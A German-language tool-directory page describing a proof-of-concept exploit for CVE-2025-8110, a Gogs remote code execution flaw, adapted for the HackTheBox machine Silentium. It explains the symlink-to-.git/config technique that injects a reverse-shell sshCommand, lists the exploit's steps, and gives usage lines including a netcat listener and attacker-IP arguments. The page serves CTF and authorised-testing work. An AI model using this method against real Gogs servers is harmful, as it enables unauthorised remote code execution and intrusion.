Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-8110-Silentium-HTB — CVE-2025-8110 Speziell für die Silentium-Box auf HTB. | Kitploit
Tools/GitHubGitHub/hassan-hamadi/cve-2025-8110-silentium-htb
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & Bildung
GitHubhassan-hamadi/cve-2025-8110-silentium-htb

CVE-2025-8110-Silentium-HTB

CVE-2025-8110 Speziell für die Silentium-Box auf HTB.

Repository anzeigen
1vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-8110 — Gogs RCE PoC (Silentium / HackTheBox)

Haftungsausschluss: Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Penetrationstests gedacht. Verwenden Sie es nur gegen Systeme, für die Sie eine ausdrückliche Genehmigung zum Testen haben.


Dies ist eine modifizierte Version von zAbuQasem/gogs-CVE-2025-8110, angepasst für die Maschine Silentium auf HackTheBox. Der ursprüngliche PoC musste angepasst werden, um die spezifische Gogs-Konfiguration und den Authentifizierungsablauf von Silentium zu berücksichtigen.


Die Schwachstelle

CVE-2025-8110 ist eine Schwachstelle zur Remote-Code-Ausführung in Gogs, einem selbst gehosteten Git-Dienst.

Der Datei-Update-API-Endpunkt von Gogs (PUT /api/v1/repos/.../contents/<file>) validiert nicht, ob die Zieldatei ein Symlink ist. Ein authentifizierter Angreifer kann einen Symlink, der auf .git/config zeigt, in ein Repository pushen und dann die API nutzen, um ihn mit einer bösartigen Nutzlast zu überschreiben. Die Nutzlast injiziert einen benutzerdefinierten sshCommand in die Git-Konfiguration, den Gogs beim nächsten SSH-Vorgang auf diesem Repository serverseitig ausführt, was zu Remote-Code-Ausführung führt.


Was der PoC tut

  1. Authentifiziert sich bei Gogs und extrahiert ein CSRF-Token von der Anmeldeseite.
  2. Erzeugt ein Gogs-API-Token über die Benutzereinstellungsseite.
  3. Erstellt ein neues Repository über die API mit aktiviertem SSH.
  4. Klont das Repository lokal, platziert einen Symlink (malicious_link -> .git/config) und pusht ihn.
  5. Ruft die Datei-Update-API für den Symlink auf und schreibt eine bösartige .git/config, die sshCommand = <reverse shell> enthält.
  6. Gogs folgt dem Symlink und überschreibt seine eigene .git/config, wodurch bei der nächsten SSH-Operation die Shell ausgelöst wird.

Verwendung

Abhängigkeiten installieren:

root@kitploit:~
pip install -r requirements.txt

Einen Listener starten:

root@kitploit:~
nc -lvnp <PORT>

Den Exploit ausführen:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>

Optional — über Burp Suite leiten:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
FlagBeschreibung
-uGogs-Basis-URL
-lhIhre Angreifer-IP (Reverse-Shell-Host)
-lpIhr Listener-Port
-unIhr registrierter Gogs-Benutzername
-pwIhr Gogs-Passwort
-x(Optional) Leitet den Datenverkehr über Burp auf localhost:8080
Tool herunterladen